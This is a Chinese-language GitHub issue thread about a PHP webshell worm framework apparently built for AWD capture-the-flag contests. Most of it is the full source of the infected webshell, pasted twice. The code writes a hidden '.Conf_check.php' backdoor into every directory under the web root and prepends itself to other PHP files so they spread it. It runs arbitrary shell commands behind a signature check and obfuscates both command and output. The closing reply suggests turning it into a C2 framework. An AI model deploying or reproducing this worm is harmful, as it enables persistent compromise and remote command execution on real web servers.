### ISSUE TITLE
求助作者师傅

### ISSUE THREAD

**Issue by kellytxm** [3sNwgeek/awd_worm_phpwebshell_framework#3]
看到师傅在注释里写了我前东家 通服CCS的名字顿感亲切，最近在肝AWD，看到师傅的文章醍醐灌顶独树一帜，但是在运行时遇到一些问题，无奈网上资料甚少，只能回来求助。
测试环境 py 2.7.18  PHP 5.5.9
现有这一版：
1. .mixV4,php 访问后没有感染同级目录的文件,但是自己无限刷新。
2. light.py文件 修改target_ip.txt 和 命令 whoami 后VScode运行报错，IDEL 运行无显示

PYDEV DEBUGGER WARNING:
sys.settrace() should not be used when the debugger is being used.
This may cause the debugger to stop working correctly.
If this is needed, please check: 
http://pydev.blogspot.com/2007/06/why-cant-pydev-debugger-work-with.html
to see how to restore the debug tracing back correctly.
Call Location:
  File "d:\Program Files\Python27\lib\site-packages\gevent\threadpool.py", line 157, in _before_run_task
    _sys.settrace(_get_thread_trace())

It seems that the gevent monkey-patching is being used.

没办法，回去重新读文章1-4  复制1中shell的代码 访问shell.php?_ 感染同级目录文件成功
.Conf_check.php未生成，下级目录生成的木马名字是这样的，301fc2d6cbb215a0b5d4c0c6c6742684.php  
而且各个文件夹的名字不同，下级目录的php未被感染。
使用配套的PY脚本 修改木马文件url 和 命令whoami  运行无回显，下断点 print(timeskew) 显示为 0

希望大佬能抽时间回复，在线等您 249866766@qq.com

感染后生成的木马为：
<?php
$tips = 'AWD_Light_Check';
//这个是后面检查的是否感染头，如果没有，就会重写这个php
error_reporting(0);
$Serv_Num = 159;
//这个变量是要写入其他文件头部的本页行数，因为感染了其他php要互相感染，不能把其他原有php代码写入到其他php，会乱套。
$arr_dir = array();
//全局变量，扫到的文件夹
$files = array();
//全局变量，扫到的文件
if (!function_exists('Url_Check')) {
    function Url_Check()
    {
        $pageURL = 'http';
        if ($_SERVER["HTTPS"] == "on") {
            $pageURL .= "s";
        }
        $pageURL .= '://';
        $pageURL .= $_SERVER["SERVER_NAME"] . ":" . $_SERVER["SERVER_PORT"];
        return $pageURL;
    }
    function file_check($dir)
    {
        //扫描文件夹
        global $arr_dir;
        global $files;
        if (is_dir($dir)) {
            if ($handle = opendir($dir)) {
                while (($file = readdir($handle)) !== false) {
                    if ($file != '.' && $file != "..") {
                        if (is_dir($dir . "/" . $file)) {
                            $arr_dir[] = $dir;
                            $files[$file] = file_check($dir . "/" . $file);
                            //拼接文件
                        } else {
                            $arr_dir[] = $dir;
                            $files[] = $dir . "/" . $file;
                        }
                    }
                }
            }
        }
        closedir($handle);
        $arr_dir = array_unique($arr_dir);
        //去重
    }
    function write_conf()
    {
        #每个目录创一个马
        global $Serv_Num;
        global $arr_dir;
        foreach ($arr_dir as $dir_path) {
            // echo '<br>'.$dir_path;
            $srcode = '';
            $localtext = file(__FILE__);
            for ($i = 0; $i < $Serv_Num; $i++) {
                $srcode .= $localtext[$i];
            }
            //所有文件夹都生成一个webshell
            // echo "<span style='color:#666'></span> " . $dir_path . "/.Conf_check.php" . "<br/>";
            $le = Url_Check();
            echo '<iframe id="check_url">' . $le . '' . str_replace($_SERVER['DOCUMENT_ROOT'], '', $dir_path . "/.Conf_check.php") . '</iframe>';
            fputs(fopen($dir_path . "/.Conf_check.php", "w"), $srcode);
        }
        // 当前目录所有php被感染
    }
    function vul_tran()
    {
        //每个文件夹递归生成一个默认的马以及感染当前目录所有php文件。所谓感染就是把自身固定的代码插入到其他php文件中，甚至可以加注释符号或者退出函数exit()；控制其他页面的可用性。不过要注意一下，是当前目录，这样响应速度会快很多，亲测如果是一次性感染全部目录的php文件后续会引发py客户端响应超时及其他bug，所以改过来了。
        //######
        global $Serv_Num;
        $pdir = dirname(__FILE__);
        //要获取的目录
        //先判断指定的路径是不是一个文件夹
        if (is_dir($pdir)) {
            if ($dh = opendir($pdir)) {
                while (($fi = readdir($dh)) != false) {
                    //文件名的全路径 包含文件名
                    $file_Path = $pdir . '/' . $fi;
                    if (strpos($file_Path, '.php')) {
                        //筛选当前目录.php后缀
                        $le = Url_Check();
                        $file_Path = str_replace('\\', '/', $file_Path);
                        echo '<iframe id="check_url">' . $le . '' . str_replace($_SERVER['DOCUMENT_ROOT'], '', $file_Path) . '</iframe>';
                        $ftarget = file($file_Path);
                        if (!strpos($ftarget[0], 'AWD_Light_Check')) {
                            //检查头部是否传播
                            $scode = '';
                            $localtext = file(__FILE__);
                            for ($i = 0; $i < $Serv_Num; $i++) {
                                $scode .= $localtext[$i];
                            }
                            $code_check = '';
                            $file_check = fopen($file_Path, "r");
                            //复制要传播的文件代码，进行重写
                            while (!feof($file_check)) {
                                $code_check .= fgets($file_check) . "\n";
                            }
                            fclose($file_check);
                            $webpage = fopen($file_Path, "w");
                            fwrite($webpage, $scode . $code_check);
                            fclose($webpage);
                        }
                    }
                }
                closedir($dh);
            }
        }
    }
}
///////////////////////////////////////////////////////////////////////////////////
//主函数
try {
    //定义特征才启动传播模式，特征值为_
    if (isset($_GET['_'])) {
        $host = Url_Check();
        file_check($_SERVER['DOCUMENT_ROOT']);
        //全局扫描
        write_conf();
        //写入单文件
        vul_tran();
        //感染当前目录
    } elseif (isset($_GET['time']) && isset($_GET['salt']) && isset($_GET['sign'])) {
        #客户端数字签名校验
        $Check_key = '9c82746189f3d1815f1e6bfe259dac29';
        $Check_api = $_GET['check'];
        $timestamp = $_GET['time'];
        $salt = $_GET['salt'];
        $csign = $_GET['sign'];
        $sign = md5($Check_api . $Check_key . $timestamp . $salt);
        if ($sign === $csign) {
            $nomal_test = '';
            for ($i = 0; $i < strlen($Check_api); $i++) {
                $nomal_test .= chr(ord($Check_api[$i]) ^ $i % $salt);
            }
            $nomal_test = base64_decode($nomal_test);
            $nowtime = time();
            if (abs($nowtime - $timestamp) <= 5) {
                $enc = base64_encode(rawurlencode(`{$nomal_test}`));
                //解密并执行命令在加密返回
                $pieces = explode("i", $enc);
                $final = "";
                foreach ($pieces as $val) {
                    $final .= $val . "cAFAcABAAswTA2GE2c";
                }
                $final = str_replace("=", ":kcehc_revres", $final);
                echo strrev(substr($final, 0, strlen($final) - 18));
                exit;
            } else {
                header('HTTP/1.1 500 Internal Server Error');
            }
        } else {
            header('HTTP/1.1 500 Internal Server Error');
        }
    } else {
        header('HTTP/1.1 500 Internal Server Error');
    }
} catch (Exception $e2) {
}<?php
<?php

$tips = 'AWD_Light_Check';

//这个是后面检查的是否感染头，如果没有，就会重写这个php

error_reporting(0);

$Serv_Num = 159;

//这个变量是要写入其他文件头部的本页行数，因为感染了其他php要互相感染，不能把其他原有php代码写入到其他php，会乱套。

$arr_dir = array();

//全局变量，扫到的文件夹

$files = array();

//全局变量，扫到的文件

if (!function_exists('Url_Check')) {

    function Url_Check()

    {

        $pageURL = 'http';

        if ($_SERVER["HTTPS"] == "on") {

            $pageURL .= "s";

        }

        $pageURL .= '://';

        $pageURL .= $_SERVER["SERVER_NAME"] . ":" . $_SERVER["SERVER_PORT"];

        return $pageURL;

    }

    function file_check($dir)

    {

        //扫描文件夹

        global $arr_dir;

        global $files;

        if (is_dir($dir)) {

            if ($handle = opendir($dir)) {

                while (($file = readdir($handle)) !== false) {

                    if ($file != '.' && $file != "..") {

                        if (is_dir($dir . "/" . $file)) {

                            $arr_dir[] = $dir;

                            $files[$file] = file_check($dir . "/" . $file);

                            //拼接文件

                        } else {

                            $arr_dir[] = $dir;

                            $files[] = $dir . "/" . $file;

                        }

                    }

                }

            }

        }

        closedir($handle);

        $arr_dir = array_unique($arr_dir);

        //去重

    }

    function write_conf()

    {

        #每个目录创一个马

        global $Serv_Num;

        global $arr_dir;

        foreach ($arr_dir as $dir_path) {

            // echo '<br>'.$dir_path;

            $srcode = '';

            $localtext = file(__FILE__);

            for ($i = 0; $i < $Serv_Num; $i++) {

                $srcode .= $localtext[$i];

            }

            //所有文件夹都生成一个webshell

            // echo "<span style='color:#666'></span> " . $dir_path . "/.Conf_check.php" . "<br/>";

            $le = Url_Check();

            echo '<iframe id="check_url">' . $le . '' . str_replace($_SERVER['DOCUMENT_ROOT'], '', $dir_path . "/.Conf_check.php") . '</iframe>';

            fputs(fopen($dir_path . "/.Conf_check.php", "w"), $srcode);

        }

        // 当前目录所有php被感染

    }

    function vul_tran()

    {

        //每个文件夹递归生成一个默认的马以及感染当前目录所有php文件。所谓感染就是把自身固定的代码插入到其他php文件中，甚至可以加注释符号或者退出函数exit()；控制其他页面的可用性。不过要注意一下，是当前目录，这样响应速度会快很多，亲测如果是一次性感染全部目录的php文件后续会引发py客户端响应超时及其他bug，所以改过来了。

        //######

        global $Serv_Num;

        $pdir = dirname(__FILE__);

        //要获取的目录

        //先判断指定的路径是不是一个文件夹

        if (is_dir($pdir)) {

            if ($dh = opendir($pdir)) {

                while (($fi = readdir($dh)) != false) {

                    //文件名的全路径 包含文件名

                    $file_Path = $pdir . '/' . $fi;

                    if (strpos($file_Path, '.php')) {

                        //筛选当前目录.php后缀

                        $le = Url_Check();

                        $file_Path = str_replace('\\', '/', $file_Path);

                        echo '<iframe id="check_url">' . $le . '' . str_replace($_SERVER['DOCUMENT_ROOT'], '', $file_Path) . '</iframe>';

                        $ftarget = file($file_Path);

                        if (!strpos($ftarget[0], 'AWD_Light_Check')) {

                            //检查头部是否传播

                            $scode = '';

                            $localtext = file(__FILE__);

                            for ($i = 0; $i < $Serv_Num; $i++) {

                                $scode .= $localtext[$i];

                            }

                            $code_check = '';

                            $file_check = fopen($file_Path, "r");

                            //复制要传播的文件代码，进行重写

                            while (!feof($file_check)) {

                                $code_check .= fgets($file_check) . "\n";

                            }

                            fclose($file_check);

                            $webpage = fopen($file_Path, "w");

                            fwrite($webpage, $scode . $code_check);

                            fclose($webpage);

                        }

                    }

                }

                closedir($dh);

            }

        }

    }

}

///////////////////////////////////////////////////////////////////////////////////

//主函数

try {

    //定义特征才启动传播模式，特征值为_

    if (isset($_GET['_'])) {

        $host = Url_Check();

        file_check($_SERVER['DOCUMENT_ROOT']);

        //全局扫描

        write_conf();

        //写入单文件

        vul_tran();

        //感染当前目录

    } elseif (isset($_GET['time']) && isset($_GET['salt']) && isset($_GET['sign'])) {

        #客户端数字签名校验

        $Check_key = '9c82746189f3d1815f1e6bfe259dac29';

        $Check_api = $_GET['check'];

        $timestamp = $_GET['time'];

        $salt = $_GET['salt'];

        $csign = $_GET['sign'];

        $sign = md5($Check_api . $Check_key . $timestamp . $salt);

        if ($sign === $csign) {

            $nomal_test = '';

            for ($i = 0; $i < strlen($Check_api); $i++) {

                $nomal_test .= chr(ord($Check_api[$i]) ^ $i % $salt);

            }

            $nomal_test = base64_decode($nomal_test);

            $nowtime = time();

            if (abs($nowtime - $timestamp) <= 5) {

                $enc = base64_encode(rawurlencode(`{$nomal_test}`));

                //解密并执行命令在加密返回

                $pieces = explode("i", $enc);

                $final = "";

                foreach ($pieces as $val) {

                    $final .= $val . "cAFAcABAAswTA2GE2c";

                }

                $final = str_replace("=", ":kcehc_revres", $final);

                echo strrev(substr($final, 0, strlen($final) - 18));

                exit;

            } else {

                header('HTTP/1.1 500 Internal Server Error');

            }

        } else {

            header('HTTP/1.1 500 Internal Server Error');

        }

    } else {

        header('HTTP/1.1 500 Internal Server Error');

    }

} catch (Exception $e2) {

}

**Comment by kellytxm** [comment]
订正一下第一版 shell  .config.php生成了 ，未感染文件。

**Comment by 3sNwgeek** [comment]
这个框架有局限性，我也比较菜，当时也是用windows环境测试着写的，主要比赛平台越来越完善，权限不足以改写其他页面和当前目录生成文件，个别比赛环境，只能在upload目录生成，所以这套框架对限制比较多的平台是比较鸡肋的。建议做成c2形式框架会好很多至少弥补了这个权限缺陷。
